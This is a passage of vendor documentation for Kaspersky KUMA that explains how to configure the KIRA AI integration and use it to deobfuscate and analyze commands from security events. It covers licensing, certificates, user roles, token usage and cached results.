Analyze using KIRA

In KUMA, you can use Kaspersky Investigation & Response Assistant (KIRA) to analyze the command that triggered the correlation rule. The command is written to the event field if normalization is configured to write the command to the event field. You can view the command in the event card or the correlation event card and click Analyze with KIRA in the upper part of the event card to send a query to KIRA. KIRA performs deobfuscation and displays the cached result of the previous request for the command if such a request was performed earlier. This helps investigate alerts and incidents. The analysis results are kept in cache for 14 days and are available for review. Each time a request is sent, an audit event is generated.

This functionality is available in the RU region if the following conditions are satisfied:

• An active license covering the AI module is available.

  If the license has expired, the analysis results remain available through tasks during the lifetime of the cache, that is, for 14 days from the moment the result is cached.

• A certificate was uploaded when configuring the KIRA integration. You can get the certificate file in PFX format, packed in the <customer name>.ZIP archive, and the password for the certificate from Technical Support.
• The user has one of the following roles with corresponding access rights: General administrator, Administrator, Tier 2 analyst, Tier 1 analyst, and Junior analyst. Only a user with the General administrator role can configure the integration.

Configuring integration with KIRA

To configure integration with KIRA:

1. Get a license with the AI module and activate in KUMA.
2. In the KUMA web console, go to the Settings → AI services section and in the AI services window, go to the KIRA tab.
3. On the KIRA tab, in the Certificate drop-down list, click Select file and upload the certificate file in PFX format, packed into the <customer name>.ZIP archive.
4. In the Certificate password, enter the password.
5. If necessary, in the Proxy server drop-down list, select a previously created resource or create a new resource.
6. Click Save.

   After clicking Save, you are prompted to accept the terms of use of the service. If you do not accept the terms of use, you cannot proceed to save settings and use the functionality.

   After saving the settings, the available number of tokens is displayed. The allowance is reset every day.

   If you want to disable this functionality, turn on the Disable toggle switch.

Integration is configured, you can proceed to the analysis. Analysis is available for all events: new and previously received.

Analyzing using KIRA

After configuring the integration, you can analyze commands using KIRA.

To perform an analysis:

1. Go to the card of the event or correlation event and on the toolbar in the event card, in the Analyze with KIRA drop-down list, select the field whose value you want to analyze.

   This opens the Analyze with KIRA window.

2. This opens the Analyze with KIRA window, displaying the command to be analysed. You can do the following:
   • If the command is obfuscated, it is de-obfuscated automatically without spending tokens. If you want to analyze the command in obfuscated form, in the Actions drop-down list, select Revert to original string. If necessary, you can de-obfuscate the string again.
   • If you want to know in advance how many tokens will be spent on analysis, in the Actions drop-down list, select Calculate size in tokens. Number of tokens for analysis = number of tokens to send a request + number of tokens to produce a response.
   • To analyze the command, click the Analyze button.

     If you have enough tokens, the analysis and the Query in KIRA task are started.

     Processing the request may take 30 seconds or longer.

     Tokens are expended even if the request returns an error saying that the requested topic is in the deny list; the information about remaining tokens is also updated.

The command is analyzed.

The result of the analysis is available in the same Analyze with KIRA window: the output, a brief summary, and a detailed analysis. You can also view the result in a separate window by clicking View result in the pop-up notification. This opens a separate KIRA result window, from which you can also click the link to Go to event. After the analysis is completed, the Result is displayed on the KIRA analysis tab in the event card and is available for viewing by all users with access to the Analyze with KIRA functionality.

You can also view the result of the analysis in the Task manager section in the properties of the Query in KIRA task. You can click the name of the task to select one of the following commands in the context menu:

• View result shows the results of the task from the cache to any user with access to KIRA tasks; no tokens are expended.
• Restart performs the analysis disregarding the data of the previous analysis stored in the cache; the analysis expends tokens.

Possible errors of the Analyze using KIRA task

Possible errors